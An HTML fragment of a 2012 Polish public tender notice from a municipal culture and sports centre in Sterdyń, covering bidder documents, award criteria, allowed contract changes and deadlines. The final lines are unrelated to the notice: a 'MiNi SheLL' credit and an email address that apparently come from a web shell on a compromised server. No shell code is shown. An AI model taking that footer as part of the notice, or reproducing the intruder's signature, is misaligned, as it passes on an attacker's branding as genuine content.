<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony ustalają, że zmiana umowy może nastąpić w sytuacjach:
1)	Zmiany terminu realizacji przedmiotu umowy, gdy nastąpią: 
a)	warunki atmosferyczne, uniemożliwiające prowadzenie robót budowlanych w tym przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
b)	klęski żywiołowe;
c)	zmiany spowodowane warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi itp., w szczególności odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
d)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie realizacji umowy przez Zamawiającego, konieczność usunięcia błędów lub wprowadzenie zmian w dokumentacji projektowej lub dokumentacji technicznej urządzeń;
e)	zmiany będące następstwem działania organów administracji, w szczególności: przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp. Odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej, konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu umowy, konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nieartykułowanych lub nie możliwych do jednoznacznego określenia w chwili zawierania umów;
f)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia działań w celu wykonania umowy;
g)	wykonanie dodatkowych robót zamiennych w oparciu o protokół konieczności, spisany przez strony i zatwierdzony przez Zamawiającego na podstawie kosztorysu różnicowego przy jednoczesnym zachowaniu tych samych cen i wskaźników, zawartych w kosztorysie ofertowym, stanowiącym załącznik do umowy.
h)	zaistnienie konieczności wykonania robót dodatkowych;
i)	w przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty.
2)	Zmiany osobowe
a)	zmiana osób, realizująca przedmiot umowy na inne legitymujące się, co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane, Prawo geologiczne i górnicze lub określone innymi ustawami;
b)	zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy, a od których wymagano określonego doświadczenia lub wykształcenia na inne legitymujące się doświadczeniem lub wykształceniem spełniającym wymóg SIWZ
3)	Zmiany sposobu spełnienia świadczenia - zmiany technologiczne a w szczególności:
a)	pojawienia się na rynku materiałów lub urządzeń nowej generacji pozwalającej na zaoszczędzeniu kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy:
b)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzeniu czasu realizacji inwestycji lub kosztów wykonanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy:
c)	konieczność realizowania robót przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałów niż wskazane w dokumentacji, w sytuacji, gdyby zastosowanie rozwiązań groziło niewykonaniem lub wadliwym wykonaniem robót, albo zwiększyło użyteczność przedmiotu umowy, bez pogorszenia jego parametrów eksploatacyjnych: 
4)	Zmiany organizacji spełnienia świadczeń w zakresie:
a)	zmiana zasad dokonywania odbiorów robót;
5)	Pozostałe okoliczności powodujące możliwość zmiany umowy:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze SIWZ
b)	zmiana obowiązującej stawki VAT;
c)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy;
d)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
e)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.
f)	konieczności usunięcia błędów lub wprowadzenie zmian w dokumentacji projektowej lub dokumentacji technicznej urządzeń;
2.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający wyraził zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sterdyn.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Kultury i Sportu w Sterdyni, ul. Lipowa 2, 08-320 Sterdyń, gabinet dyrektora.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2012 godzina 10:00, miejsce: Gminny Ośrodek Kultury i Sportu w Sterdyni, ul. Lipowa 2, 08-320 Sterdyń, gabinet dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 Działanie Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com